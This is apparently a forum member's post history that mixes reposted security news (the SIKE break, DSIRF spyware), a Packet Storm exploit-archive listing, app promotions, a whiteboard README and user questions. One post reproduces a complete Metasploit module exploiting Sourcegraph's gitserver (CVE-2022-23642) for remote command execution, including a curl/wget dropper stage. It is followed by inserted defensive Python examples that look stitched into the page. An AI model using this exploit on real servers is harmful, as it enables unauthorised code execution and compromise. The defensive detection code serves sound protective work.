Kev

Active Members
  • Posts: 1026
  • Joined
  • Days Won: 55

Everything posted by Kev

  1. clean, why? https://www.virustotal.com/gui/url/d73aa4df76343576171630f7e897bf5cf19d7688ae83035a2387278e4cbfe939?nocache=1
  2. Leave it to mathematicians to muck up what looked like an impressive new algorithm. In the US government's ongoing campaign to protect data in the age of quantum computers, a new and powerful attack that used a single traditional computer to completely break a fourth-round candidate highlights the risks involved in standardizing the next generation of encryption algorithms.

Last month, the US Department of Commerce's National Institute of Standards and Technology, or NIST, selected four post-quantum computing encryption algorithms to replace algorithms like RSA, Diffie-Hellman, and elliptic curve Diffie-Hellman, which are unable to withstand attacks from a quantum computer. In the same move, NIST advanced four additional algorithms as potential replacements pending further testing in hopes one or more of them may also be suitable encryption alternatives in a post-quantum world.

The new attack breaks SIKE, which is one of the latter four additional algorithms. The attack has no impact on the four PQC algorithms selected by NIST as approved standards, all of which rely on completely different mathematical techniques than SIKE.

Getting totally SIKEd

SIKE—short for Supersingular Isogeny Key Encapsulation—is now likely out of the running thanks to research that was published over the weekend by researchers from the Computer Security and Industrial Cryptography group at KU Leuven. The paper, titled An Efficient Key Recovery Attack on SIDH (Preliminary Version), described a technique that uses complex mathematics and a single traditional PC to recover the encryption keys protecting the SIKE-protected transactions. The entire process requires only about an hour’s time. The feat makes the researchers, Wouter Castryck and Thomas Decru, eligible for a $50,000 reward from NIST.

The advent of public key encryption in the 1970s was a major breakthrough because it allowed parties who had never met to securely trade encrypted material that couldn’t be broken by an adversary. Public key encryption relies on asymmetric keys, with one private key used to decrypt messages and a separate public key for encrypting. Users make their public key widely available. As long as their private key remains secret, the scheme remains secure.

In practice, public key cryptography can often be unwieldy, so many systems rely on key encapsulation mechanisms, which allow parties who have never met before to jointly agree on a symmetric key over a public medium such as the Internet. In contrast to symmetric-key algorithms, key encapsulation mechanisms in use today are easily broken by quantum computers. SIKE, before the new attack, was thought to avoid such vulnerabilities by using a complex mathematical construction known as a supersingular isogeny graph.

The cornerstone of SIKE is a protocol called SIDH, short for Supersingular Isogeny Diffie-Hellman. The research paper published over the weekend shows how SIDH is vulnerable to a theorem known as “glue-and-split” developed by mathematician Ernst Kani in 1997, as well as tools devised by fellow mathematicians Everett W. Howe, Franck Leprévost, and Bjorn Poonen in 2000. The new technique builds on what’s known as the “GPST adaptive attack,” described in a 2016 paper. The math behind the latest attack is guaranteed to be impenetrable to most non-mathematicians. Here’s about as close as you’re going to get:

“The attack exploits the fact that SIDH has auxiliary points and that the degree of the secret isogeny is known,” Steven Galbraith, a University of Auckland mathematics professor and the “G” in the GPST adaptive attack, explained in a short writeup on the new attack. “The auxiliary points in SIDH have always been an annoyance and a potential weakness, and they have been exploited for fault attacks, the GPST adaptive attack, torsion point attacks, etc.”

He continued:

Let E_0 be the base curve and let P_0, Q_0 \in E_0 have order 2^a. Let E, P, Q be given such that there exists an isogeny \phi of degree 3^b with \phi : E_0 \to E, \phi(P_0) = P, and \phi(Q_0) = Q.

A key aspect of SIDH is that one does not compute \phi directly, but as a composition of isogenies of degree 3. In other words, there is a sequence of curves E_0 \to E_1 \to E_2 \to \cdots \to E connected by 3-isogenies.

Essentially, like in GPST, the attack determines the intermediate curves E_i and hence eventually determines the private key. At step i the attack does a brute-force search of all possible E_i \to E_{i+1}, and the magic ingredient is a gadget that shows which one is correct.

(The above is over-simplified, the isogenies E_i \to E_{i+1} in the attack are not of degree 3 but of degree a small power of 3.)

More important than understanding the math, Jonathan Katz, an IEEE Member and professor in the department of computer science at the University of Maryland, wrote in an email: “the attack is entirely classical, and does not require quantum computers at all.”

Lessons learned

SIKE is the second NIST-designated PQC candidate to be invalidated this year. In February, IBM post-doc researcher Ward Beullens published research that broke Rainbow, a cryptographic signature scheme with its security, according to Cryptomathic, “relying on the hardness of the problem of solving a large system of multivariate quadratic equations over a finite field.”

NIST’s PQC replacement campaign has been running for five years. Here’s a brief history:

1st round (2017)—69 candidates
2nd round (2019)—26 surviving candidates
3rd round (2020)—7 finalists, 8 alternates
4th round (2022)—3 finalists and 1 alternate selected as standards. SIKE and three additional alternates advanced to a fourth round.

Rainbow fell during Round 3. SIKE had made it until Round 4. Katz continued:

I asked Jao, the SIKE co-inventor, why the weakness had come to light only now, in a relatively later stage of its development. His answer was insightful. He said:

The version of SIKE submitted to NIST used a single step to generate the key. A possible variant of SIKE could be constructed to take two steps. Jao said that it’s possible that this latter variant might not be susceptible to the math causing this breakage.

For now, though, SIKE is dead, at least in the current running. The schedule for the remaining three candidates is currently unknown.

Source: arstechnica.com
  3. This archive contains all of the 68 exploits added to Packet Storm in July, 2022.

Content:

Directory of 202207-exploits\2207-exploits

08/02/2022 11:41 PM <DIR> .
08/02/2022 11:41 PM <DIR> ..
07/19/2022 05:55 PM 1,489 asusgamesdk1004-unquotedpath.txt
07/05/2022 05:14 PM 1,790 atm56-sql.txt
07/01/2022 06:13 PM 1,678 bigbluebutton23-xss.txt
07/01/2022 05:50 PM 479 classifiedlisting229-xss.txt
07/21/2022 11:33 PM 8,293 codoforum51-exec.txt
07/29/2022 05:23 PM 756 crs10-xss.txt
07/25/2022 07:02 PM 549 CVE-2022-35911.sh.txt
07/21/2022 10:53 PM 468,395 DASDEC-XSS.pdf
07/29/2022 05:11 PM 3,826 dingtian31276A-bypass.txt
07/04/2022 05:23 PM 1,787 douphp12-sql.txt
07/21/2022 11:20 PM 1,615 drfone408-unquotedpath.txt
07/20/2022 07:40 PM 13,866 emporiumecommcms12-sql.txt
07/06/2022 06:25 PM 7,001 eqsintegrityline-xss.txt
07/26/2022 06:07 PM 8,840 expertxjprb10-sql.txt
07/29/2022 05:28 PM 1,757 geonetwork420-xml.txt
07/26/2022 06:09 PM 2,984 gms10-shell.txt
07/05/2022 05:11 PM 3,872 GS20220705135846.tgz
07/06/2022 06:33 PM 10,071 GS20220706153018.txt
07/06/2022 06:37 PM 6,127 GS20220706153551.tgz
07/07/2022 04:14 PM 6,804 GS20220707131306.tgz
07/11/2022 05:08 PM 1,195 GS20220711140800.txt
07/11/2022 05:12 PM 6,253 GS20220711141006.tgz
07/11/2022 05:15 PM 8,003 GS20220711141406.tgz
07/15/2022 05:57 PM 8,840 GS20220715145633.tgz
07/15/2022 05:59 PM 3,306 GS20220715145905.tgz
07/21/2022 11:39 PM 9,212 GS20220721203759.tgz
07/26/2022 06:12 PM 4,292 his10-sql.txt
07/21/2022 11:18 PM 5,973 iotransfer40-exec.txt
07/01/2022 06:15 PM 2,993 jahx221-exec.txt
07/12/2022 11:03 PM 3,801 jboss_remoting_unified_invoker_rce.rb.txt
07/21/2022 11:28 PM 757 kite120216100-unquotedpath.txt
07/28/2022 05:50 PM 4,830 loanmgmtsys10-sql.txt
07/29/2022 05:02 PM 649 loanms10-xss.txt
07/06/2022 06:20 PM 2,030 magnoliacms6219-xss.txt
07/25/2022 06:57 PM 12,766 mmves12-sql.txt
07/04/2022 05:24 PM 7,402 MVID-2022-0620.txt
07/05/2022 05:20 PM 3,213 MVID-2022-0621.txt
07/18/2022 07:38 PM 1,955 MVID-2022-0622.txt
07/18/2022 07:40 PM 2,161 MVID-2022-0623.txt
07/18/2022 07:42 PM 3,655 MVID-2022-0624.txt
07/22/2022 07:26 PM 2,698 MVID-2022-0625.txt
07/11/2022 05:19 PM 5,262 nginx1200-dos.txt
07/21/2022 11:29 PM 9,002 octobotwi043-exec.txt
07/18/2022 07:37 PM 1,460 orangestation10-sql.txt
07/04/2022 05:22 PM 708 paymoney33-xss.txt
07/26/2022 06:04 PM 1,984 pcprotectep517470-escalate.txt
07/18/2022 07:36 PM 13,878 pls31-sql.txt
07/14/2022 05:18 PM 176,787 prestashop1767-xssupload.pdf
07/26/2022 06:17 PM 3,946 roxy_wi_exec.rb.txt
07/29/2022 05:17 PM 1,034 rpcpy060-exec.txt
07/11/2022 05:20 PM 5,218 Sashimi-Evil-OctoBot-Tentacle-master.zip
07/19/2022 06:02 PM 13,369 SCHUTZWERK-SA-2022-003.txt
07/04/2022 05:20 PM 1,313 sms2020-sql.txt
07/13/2022 08:29 PM 6,129 sourcegraph_gitserver_sshcmd.rb.txt
07/18/2022 07:30 PM 11,346 tts10-sql.txt
07/01/2022 05:49 PM 2,019 typeorm-sql.txt
07/29/2022 05:14 PM 2,426 wptransposh107-auth.txt
07/29/2022 05:05 PM 2,540 wptransposh107-xss.txt
07/29/2022 05:07 PM 3,192 wptransposh107persistent-xss.txt
07/29/2022 05:31 PM 2,487 wptransposh1081-auth.txt
07/29/2022 05:26 PM 2,365 wptransposh1081-disclose.txt
07/29/2022 05:40 PM 2,496 wptransposh1081-exec.txt
07/29/2022 05:38 PM 2,953 wptransposh1081-sql.txt
07/29/2022 05:21 PM 2,954 wptransposh1081-xsrf.txt
07/29/2022 04:59 PM 823 wpuseronline2876-xss.txt
07/11/2022 05:23 PM 1,532 wpvsbb329-sql.txt
07/01/2022 06:17 PM 4,029 ZSL-2022-5709.txt
07/21/2022 11:34 PM 6,572 ZSL-2022-5710.txt
69 File(s) 935,787 bytes
2 Dir(s) 41,100,783,616 bytes free

Download: 202207-exploits.tgz (553.9 KB)

Source
  4. On the main page, I expressed myself wrongly. Yes, poker, etc... I put consent on it, and the user has to fill in their date of birth.
  5. Joining a Wi‑Fi network By specifying the SSID, encryption type, password/passphrase, and if the SSID is hidden or not, mobile device users can quickly scan and join networks without having to manually enter the data.[49] A MECARD-like format is supported by Android and iOS 11+.[50] Try free now Source: wikipedia
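As an added example (not from the post above or from Wikipedia), the Python below builds and parses the Wi-Fi record the passage describes. The layout it assumes is the ZXing convention that Android and iOS readers follow: a WIFI: prefix, T for encryption type, S for SSID, P for password, H for a hidden network, each field closed by ; and the record by ;;, with the characters \ ; , " : escaped by a backslash inside a value. The function names and the sample values are constructed for this example. The parser treats the scanned string as untrusted input and rejects malformed records and over-long SSIDs instead of passing them on to a network-configuration API.

```python
# Added example: build and parse the "WIFI:" QR payload (ZXing convention assumed).
# Field keys: T = encryption type, S = SSID, P = password, H = hidden network.
# The characters \ ; , " : inside a value are escaped with a backslash.
from typing import Dict, Optional

SPECIAL = '\\;,":'                     # delimiters that must be escaped inside a value
AUTH_TYPES = ('WPA', 'WEP', 'nopass')  # encryption types the record may carry


def escape(value: str) -> str:
    """Backslash-escape the delimiter characters so they survive inside a field."""
    return ''.join('\\' + ch if ch in SPECIAL else ch for ch in value)


def build_wifi_payload(ssid: str, password: Optional[str] = None,
                       auth: str = 'WPA', hidden: bool = False) -> str:
    """Return the string to encode into the QR code."""
    if auth not in AUTH_TYPES:
        raise ValueError(f'unsupported encryption type {auth!r}')
    if len(ssid.encode('utf-8')) > 32:            # 802.11 limits an SSID to 32 octets
        raise ValueError('SSID longer than 32 bytes')
    if auth == 'nopass' and password:
        raise ValueError('an open network carries no password')
    if auth != 'nopass' and not password:
        raise ValueError('a secured network needs a password')
    fields = [('T', auth), ('S', ssid)]
    if password:
        fields.append(('P', password))
    if hidden:
        fields.append(('H', 'true'))
    return 'WIFI:' + ''.join(f'{key}:{escape(val)};' for key, val in fields) + ';'


def parse_wifi_payload(payload: str) -> Dict[str, str]:
    """Split a scanned record into its fields, honouring backslash escapes.

    Raises ValueError on anything that is not a well-formed record; a scanner
    should refuse such input rather than hand it to the OS.
    """
    if not payload.startswith('WIFI:') or not payload.endswith(';;'):
        raise ValueError('not a WIFI: record')
    body = payload[len('WIFI:'):-1]   # drop the prefix and one of the two closing ';'
    fields: Dict[str, str] = {}
    i = 0
    while i < len(body):
        if i + 1 >= len(body) or body[i + 1] != ':':
            raise ValueError(f'malformed field at offset {i}')
        key = body[i]
        i += 2
        chars = []
        while i < len(body) and body[i] != ';':
            if body[i] == '\\':           # escaped delimiter: take the next char literally
                i += 1
                if i >= len(body):
                    raise ValueError('dangling escape at end of record')
            chars.append(body[i])
            i += 1
        if i >= len(body):
            raise ValueError(f'unterminated field {key!r}')
        i += 1                            # skip the ';' that closes this field
        if key in fields:
            raise ValueError(f'duplicate field {key!r}')
        fields[key] = ''.join(chars)
    if 'S' not in fields or len(fields['S'].encode('utf-8')) > 32:
        raise ValueError('missing or over-long SSID')
    if fields.get('T', 'nopass') not in AUTH_TYPES:
        raise ValueError('unknown encryption type')
    return fields


def is_well_formed(payload: str) -> bool:
    """Convenience wrapper for callers that only need an accept/reject decision."""
    try:
        parse_wifi_payload(payload)
        return True
    except ValueError:
        return False


if __name__ == '__main__':
    record = build_wifi_payload('Café;Guest', 'p@ss:word', 'WPA', hidden=True)
    print(record)
    print(parse_wifi_payload(record))
```

The round trip matters because an SSID or passphrase may legitimately contain ; or :; a builder that does not escape them produces a record that a strict parser rejects, and a parser that does not unescape them joins the wrong network.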
  6. Hi, does it affect page indexing in search engines in any way if I install an Agree and Disagree plugin with the year of birth on the index page? Or do some changes have to be made in robots.txt? Agree redirects them to index2, Disagree back to Google; the site's content is not shown if they don't fill in their date of birth, e.g. yourfreedom.ro. Thanks in advance
  7. Windows and Adobe Reader exploits said to target orgs in Europe and Central America.

Microsoft said on Wednesday that an Austria-based company named DSIRF used multiple Windows and Adobe Reader zero-days to hack organizations located in Europe and Central America. Multiple news outlets have published articles like this one, which cited marketing materials and other evidence linking DSIRF to Subzero, a malicious toolset for “automated exfiltration of sensitive/private data” and “tailored access operations [including] identification, tracking and infiltration of threats.”

Members of the Microsoft Threat Intelligence Center, or MSTIC, said they have found Subzero malware infections spread through a variety of methods, including the exploitation of what at the time were Windows and Adobe Reader zero-days, meaning the attackers knew of the vulnerabilities before Microsoft and Adobe did. Targets of the attacks observed to date include law firms, banks, and strategic consultancies in countries such as Austria, the UK, and Panama, although those aren’t necessarily the countries in which the DSIRF customers who paid for the attack resided. An email sent to DSIRF seeking comment wasn’t returned.

Wednesday’s post is the latest to take aim at the scourge of mercenary spyware sold by private companies. Israel-based NSO Group is the best-known example of a for-profit company selling pricey exploits that often compromise the devices belonging to journalists, attorneys, and activists. Another Israel-based mercenary named Candiru was profiled by Microsoft and University of Toronto’s Citizen Lab last year and was recently caught orchestrating phishing campaigns on behalf of customers that could bypass two-factor authentication.

Also on Wednesday, the US House of Representatives Permanent Select Committee on Intelligence held a hearing on the proliferation of foreign commercial spyware. One of the speakers was the daughter of a former hotel manager in Rwanda who was imprisoned after saving hundreds of lives and speaking out about the genocide that had taken place. She recounted the experience of having her phone hacked with NSO spyware the same day she met with the Belgian foreign affairs minister.

Referring to DSIRF using the word KNOTWEED, Microsoft researchers wrote:

Wednesday’s post also provides detailed indicators of compromise that readers can use to determine if they have been targeted by DSIRF. Microsoft used the term PSOA—short for private-sector offensive actor—to describe cyber mercenaries like DSIRF. The company said most PSOAs operate under one or both of two models. The first, access-as-a-service, sells full end-to-end hacking tools to customers for use in their own operations. In the other model, hack-for-hire, the PSOA carries out the targeted operations itself.

Source: arstechnica.com
  8. Accessible and engaging coding for all. Enable every student to express themselves through code.
Paint: Inspired by the Logo Turtle, Paint allows students to create animated designs with code.
Chatbot: Make chatbots that crack jokes, answer questions, play games, or tell stories.
URL: https://www.pickcode.io
Try the preview
Source: Google
  9. Meet Writesonic: World's only AI writer that helps you write SEO-optimized, long-form (up to 1500 words) blog posts & articles in 15 seconds. Received from a friend. URL: https://writesonic.com/
  10. Hi. I own a WiFi stick, fine... blah blah, I want to shut down the unit from my phone over WiFi (Android). Thanks. Edit: via hotspot. Later edit: TeamViewer
  11. Man, given that it shows me N+S+E+W on GPS and the speed I'm moving at, plus my heart rate etc... it ought to exist
  12. Dude, I want to stand in one spot, and when someone passes me at 170 km/h it should show me their speed; what you sent me with imgtflyflklg doesn't work, it's for the speed YOU are travelling at, not someone else. Edit: to put it in terms you'll understand: So: the idiot with a licence bought from who knows where passes at 200 km/h while I'm stationary, capisce?
  13. It got deleted, there's juice on the keyboard. On topic: at the risk of repeating myself, the voicemail changes within a distance of 500m/1Km
  14. Hi, I call someone on the Orange RO network, and when voicemail kicks in, it answers me with: one message if that person is at home, another if that person has moved 500m/1Km; the same robot voice, could it come from the relay? Thanks
  15. The efficient digital whiteboard.

qboard is a wholly client-side whiteboard app with efficient keyboard shortcuts, to make drawing feel as seamless as possible. In the spirit of Vim, it's possible to do everything that isn't drawing without moving your hands. It's hosted on my website. Here's a demo video:

Features

Here are the default keybindings:

Tab cycles through three toolbar visibilities: the full toolbar, a status pane, and completely hidden.
Shift snaps lines to multiples of 45°, and makes squares and circles.
X is Cut when there's something selected, and Eraser when nothing is selected. The Eraser is element level: it removes entire paths. You can use X to delete whatever you have selected.
E or R, when already that color, resets it to black.

There are also keybindings with Shift and Ctrl, which you can view in-app.

Other neat things you can do:

Hit the export button to save to a PDF. The save button exports to a JSON file, which you can later load back in to qboard.
Use your browser's paste function (usually Ctrl+V or Cmd+V on Mac) to paste images from the system clipboard. You can also drag images onto the board, or use the file picker on the left side of the screen (labeled Open).
Open your saved JSON files with the file picker to replace your current board with one from a file. Alternatively, drag and drop your saved JSON files; instead of overwriting your current board, this will insert the contents of the files into the board after the current page!
Right-click to bring up a context menu to change the style.
If you have a saved JSON file accessible via a URL, you can make a link that preloads the board with that file, like this one: https://cjquines.com/qboard/?json=example.json.

Design principles

qboard is made for seamless lecturing. It's designed to be easy to use and nice to look at while sharing your screen. It should also be easy to share what you've written afterward as a PDF. This guides some of its principles:

It should be possible to do everything that isn't drawing just with keys. Ideally, only with the keys on one half of the keyboard, to make presentations flow smoothly. You shouldn't need to move your mouse all the way to the left to change tools, or to move your hand to the right to switch to the pen tool.
It has pages, rather than extending in different directions. It should feel like writing on multiple blackboards, and not an infinite sheet of paper. We are considering changing this to allow an infinite scroll mode (see #6).
Pages are fixed at a 16:9 ratio, so that, in full-screen mode, most screens are perfectly filled by qboard. Additionally, when pages are later exported to a PDF, they have the same dimensions as a slideshow.

There is some sense to the default keybindings:

The three keys I use the most are on F, D, and S. A is assigned to make sense with S, and Shift + F to make sense with F.
I tend to switch between colors and back while presenting, hence the E and R bindings.
Imitating vim, X is like delete, which both cuts and erases.
Ellipse and Rectangle start with E and R, while V is Move in Photoshop too.
Q, A, and Z control stroke style, and W, S, and X control fill style. They form a column, going from "least" to "most".
The Ctrl keybindings are pretty universal, except maybe D, for Duplicate.

Although initially designed for giving lectures, the whiteboard controls are pretty good.

Frequently asked questions

There was a short period of time when we used a different file format for our JSON files. It's very unlikely that you have such a file. In case you do, you can make it compatible with the modern qboard app by taking the file and wrapping the contents like so:

{ "qboard-version": 1, "pages": OLD_FILE_CONTENTS_GO_HERE }

If we have released a new file version beyond version 1, just opening any old files and saving them again will update them to the latest version.

Implementation details

It's built on the nwb toolkit, which handles React, Webpack, and Babel. We're using Typescript. The main app is mostly powered through Fabric.js, with KeyboardJS handling keybindings, and pdfmake handling exporting to PDF.

We extend the Fabric canvas to a Page class with some convenience functions. The Pages class stores pages in a JSON array; whenever we switch pages, we remove all the objects in the canvas and reload from memory. In other words, we only store the live objects for the current page; all other pages are stored serialized. Boards are serialized to JSON just by collecting the serialized array, and adding a small amount of metadata to ensure compatibility. A saved qboard file is thus entirely human-readable, though since it also stores paths, it may be unwieldy.

We also work with two canvas elements. The top canvas is a temporary one that renders lines, ellipses, and rectangles as they're being drawn, and after they're drawn, they're removed and added to the base canvas. The base canvas handles everything else: the move tool, free drawing, the eraser, and so on; the top canvas is hidden for these operations. This is for performance reasons, so the base canvas doesn't have to rerender every time the mouse moves on the top canvas.

The main source is qboard.ts, which handles listening to mouse events and switching tools. Everything else is delegated to handlers, which are in individual files:

action.ts, which abstracts the actions for the front-end.
clipboard.ts, which handles cutting, copying, and pasting.
history.ts, which undoes and redoes with a pure(-ish) history stack.
keyboard.ts, which catches keyboard events that aren't H.
styles.ts, which gives an interface for changing pen style.
tools.ts, which implements each non-free-drawing tool.

Development

Running npm start will start a development server, which watches source files for changes. Run npm run build to generate the static application files, suitable for hosting or offline use. We have linters; run the full suite with npm run lint, and automatically fix most warnings/errors with npm run lint:fix. If you maintain a top-level deploy.js file, you can build the files and deploy in one step by running npm run deploy.

We also have a Dockerfile which runs the development server in a container; build the image with docker build -t qboard ., then run with docker run -d --name qboard qboard. Note that this server is not suitable for production use; just host the static files instead.

The FabricJS file is huge and it doesn't support tree shaking, so the qboard demo at cjquines.com uses a custom build. It includes gestures, animation, free drawing, interaction, serialization, fabric.Rect, fabric.Ellipse, fabric.Image, fabric.Line, and window.fabric, which I think is the absolute minimum needed for it to work. (Do note that custom build currently has issues, though. If you encounter errors, you may wish to try this demo, which uses the full build.)

Download: qboard-master.zip or git clone https://github.com/cjquines/qboard.git

Source
  16. Hi, is there any app for Android that detects a vehicle's speed? What I found in the Store are only anti-radar {anti-police} ones. Thanks in advance
  17. A vulnerability exists within Sourcegraph's gitserver component that allows a remote attacker to execute arbitrary OS commands by modifying the core.sshCommand value within the git configuration. This command can then be triggered on demand by executing a git push operation. The vulnerability was patched by introducing a feature flag in version 3.37.0. This flag must be enabled for the protections to be in place which filter the commands that are able to be executed through the git exec REST API.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Sourcegraph gitserver sshCommand RCE',
        'Description' => %q{
          A vulnerability exists within Sourcegraph's gitserver component that allows a remote attacker to
          execute arbitrary OS commands by modifying the core.sshCommand value within the git configuration.
          This command can then be triggered on demand by executing a git push operation. The vulnerability
          was patched by introducing a feature flag in version 3.37.0. This flag must be enabled for the
          protections to be in place which filter the commands that are able to be executed through the
          git exec REST API.
        },
        'Author' => [
          'Altelus1', # github PoC
          'Spencer McIntyre' # metasploit module
        ],
        'References' => [
          ['CVE', '2022-23642'],
          ['URL', 'https://github.com/sourcegraph/sourcegraph/security/advisories/GHSA-qcmp-fx72-q8q9'],
          ['URL', 'https://github.com/Altelus1/CVE-2022-23642'],
        ],
        'DisclosureDate' => '2022-02-18', # Public disclosure
        'License' => MSF_LICENSE,
        'Platform' => ['unix', 'linux'],
        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
        'Targets' => [
          [
            'Unix Command',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_memory
            },
          ],
          [
            'Linux Dropper',
            {
              'Platform' => 'linux',
              # when the OS command is executed, it's executed twice which will cause some of the command stagers to
              # be corrupt, these two work even for larger payloads because they're downloaded in a single command
              'CmdStagerFlavor' => %w[curl wget],
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :linux_dropper
            },
          ]
        ],
        'DefaultOptions' => {
          'RPORT' => 3178
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )

    register_options([
      OptString.new('TARGETURI', [true, 'Base path', '/']),
      OptString.new('EXISTING_REPO', [false, 'An existing, cloned repository'])
    ])
  end

  def check
    res = send_request_exec(Rex::Text.rand_text_alphanumeric(4..11), ['config', '--default', '', 'core.sshCommand'])
    return CheckCode::Unknown unless res

    if res.code == 200 && res.body =~ /^X-Exec-Exit-Status: 0/
      # this is the response if the target repo does exist, highly unlikely since it's randomized
      return CheckCode::Vulnerable('Successfully set core.sshCommand.')
    elsif res.code == 404 && res.body =~ /"cloneInProgress"/
      # this is the response if the target repo does not exist
      return CheckCode::Vulnerable
    elsif res.code == 400 && res.body =~ /^invalid command/
      # this is the response when the server is patched, regardless of if there are cloned repos
      return CheckCode::Safe
    end

    CheckCode::Unknown
  end

  def exploit
    if datastore['EXISTING_REPO'].blank?
      @git_repo = send_request_list.sample
      fail_with(Failure::NotFound, 'Did not identify any cloned repositories on the remote server.') unless @git_repo

      print_status("Using automatically identified repository: #{@git_repo}")
    else
      @git_repo = datastore['EXISTING_REPO']
    end

    print_status("Executing #{target.name} target")
    @git_origin = Rex::Text.rand_text_alphanumeric(4..11)
    git_remote = "git@#{Rex::Text.rand_text_alphanumeric(4..11)}:#{Rex::Text.rand_text_alphanumeric(4..11)}.git"
    vprint_status("Using #{@git_origin} as a fake git origin")
    send_request_exec(@git_repo, ['remote', 'add', @git_origin, git_remote])

    case target['Type']
    when :unix_memory
      execute_command(payload.encoded)
    when :linux_dropper
      execute_cmdstager
    end
  end

  def cleanup
    return unless @git_repo && @git_origin

    vprint_status('Cleaning up the git changes...')
    # delete the remote that was created
    send_request_exec(@git_repo, ['remote', 'remove', @git_origin])
    # unset the core.sshCommand value
    send_request_exec(@git_repo, ['config', '--unset', 'core.sshCommand'])
  ensure
    super
  end

  def send_request_exec(repo, args, timeout = 20)
    send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'exec'),
      'method' => 'POST',
      'data' => { 'Repo' => repo, 'Args' => args }.to_json
    }, timeout)
  end

  def send_request_list
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'list'),
      'method' => 'GET',
      'vars_get' => { 'cloned' => 'true' }
    })
    fail_with(Failure::Unreachable, 'No server response.') unless res
    fail_with(Failure::UnexpectedReply, 'The gitserver list API call failed.') unless res.code == 200 && res.get_json_document.is_a?(Array)

    res.get_json_document
  end

  def execute_command(cmd, _opts = {})
    vprint_status("Executing command: #{cmd}")
    res = send_request_exec(@git_repo, ['config', 'core.sshCommand', cmd])
    fail_with(Failure::Unreachable, 'No server response.') unless res

    unless res.code == 200 && res.body =~ /^X-Exec-Exit-Status: 0/
      if res.code == 404 && res.get_json_document.is_a?(Hash) && res.get_json_document['cloneInProgress'] == false
        fail_with(Failure::BadConfig, 'The specified repository has not been cloned.')
      end

      fail_with(Failure::UnexpectedReply, 'The gitserver exec API call failed.')
    end

    send_request_exec(@git_repo, ['push', @git_origin, 'master'], 5)
  end
end

# 0day.today [2022-07-17] #

Source
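As an added example that is not part of the Metasploit module above or of Sourcegraph's code base, the Python below looks at the same /exec request shape ({"Repo": ..., "Args": [...]}) from the defender's side. It shows a read-only command allowlist of the kind the 3.37.0 feature flag is described as enforcing, and a scan over request-log lines for the footprint the module leaves behind (its own Notes list IOC_IN_LOGS): a core.sshCommand config write, a remote add, then a push from the same client against the same repository. The specific allowlist, the function names and the log-line format are assumptions made for this example, not Sourcegraph's real ones, and the sample log lines are constructed.

```python
# Added example (not from the Metasploit module or from Sourcegraph).
# gitserver's /exec takes a JSON body {"Repo": "<repo>", "Args": ["<git subcommand>", ...]}.
#  1. validate_exec_args(): the kind of allowlist the 3.37.0 feature flag enforces;
#     the allowlist below is an ASSUMPTION for this example, not Sourcegraph's real list.
#  2. scan_log(): spots the module's footprint in request logs.
import json
from typing import Dict, List, Optional, Tuple

# ASSUMED read-only allowlist; anything else is refused with "invalid command".
READ_ONLY_SUBCOMMANDS = frozenset({
    'rev-parse', 'rev-list', 'log', 'show', 'diff', 'diff-tree', 'ls-tree',
    'ls-files', 'cat-file', 'for-each-ref', 'symbolic-ref', 'blame',
})
# 'git config' options that read a value rather than write one.
CONFIG_READ_FLAGS = frozenset({'--get', '--get-all', '--get-regexp', '--list', '-l', '--default'})


def validate_exec_args(args: object) -> Tuple[bool, str]:
    """Return (ok, reason). Only a known read-only subcommand with no git global
    option in front of it is allowed. 'git -c core.sshCommand=... <cmd>' and
    'git --git-dir ... <cmd>' are global options and fail the same test."""
    if not isinstance(args, list) or not args or not all(isinstance(a, str) for a in args):
        return False, 'Args must be a non-empty list of strings'
    sub = args[0]
    if sub.startswith('-'):
        return False, f'global option before subcommand not allowed: {sub}'
    if sub not in READ_ONLY_SUBCOMMANDS:
        return False, f'invalid command: {sub}'
    # Subcommand-specific options (e.g. 'log --output=<file>') still deserve their own review.
    return True, 'ok'


def request_indicator(args: List[str]) -> Optional[str]:
    """Name the suspicious thing a single /exec request does, or None."""
    if not args:
        return None
    sub = args[0]
    lowered = [a.lower() for a in args]
    if sub == 'config':
        if any(flag in args for flag in CONFIG_READ_FLAGS):
            return None                       # a read, like the module's check()
        if 'core.sshcommand' in lowered:
            return 'config_write_core_sshCommand'
    elif sub.startswith('-') and any(a.startswith('core.sshcommand=') for a in lowered):
        return 'global_option_core_sshCommand'
    elif sub == 'remote' and len(args) > 1 and args[1] == 'add':
        return 'remote_add'
    elif sub == 'push':
        return 'push'
    return None


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Group indicators per (client, repo) and alert when the chain completes."""
    chains: Dict[Tuple[str, str], List[str]] = {}
    for line in lines:
        rec = json.loads(line)
        ind = request_indicator(rec.get('Args', []))
        if ind:
            chains.setdefault((rec['client'], rec['Repo']), []).append(ind)
    alerts: List[Dict[str, object]] = []
    for (client, repo), inds in chains.items():
        sets_ssh_command = ('config_write_core_sshCommand' in inds
                            or 'global_option_core_sshCommand' in inds)
        if sets_ssh_command and 'push' in inds:
            alerts.append({'client': client, 'repo': repo, 'sequence': inds})
    return alerts


# Constructed sample log lines for this example; not real gitserver output.
SAMPLE_LOG = [
    '{"client": "10.0.0.7", "Repo": "github.com/example/app", "Args": ["rev-parse", "HEAD"]}',
    '{"client": "10.0.0.7", "Repo": "github.com/example/app", "Args": ["config", "--get", "core.sshCommand"]}',
    '{"client": "203.0.113.9", "Repo": "github.com/example/app", "Args": ["config", "core.sshCommand", "<redacted>"]}',
    '{"client": "203.0.113.9", "Repo": "github.com/example/app", "Args": ["remote", "add", "zq81k", "git@h7x:abc.git"]}',
    '{"client": "203.0.113.9", "Repo": "github.com/example/app", "Args": ["push", "zq81k", "master"]}',
]

if __name__ == '__main__':
    for line in SAMPLE_LOG:
        args = json.loads(line)['Args']
        print(args, '->', validate_exec_args(args))
    print(scan_log(SAMPLE_LOG))
```

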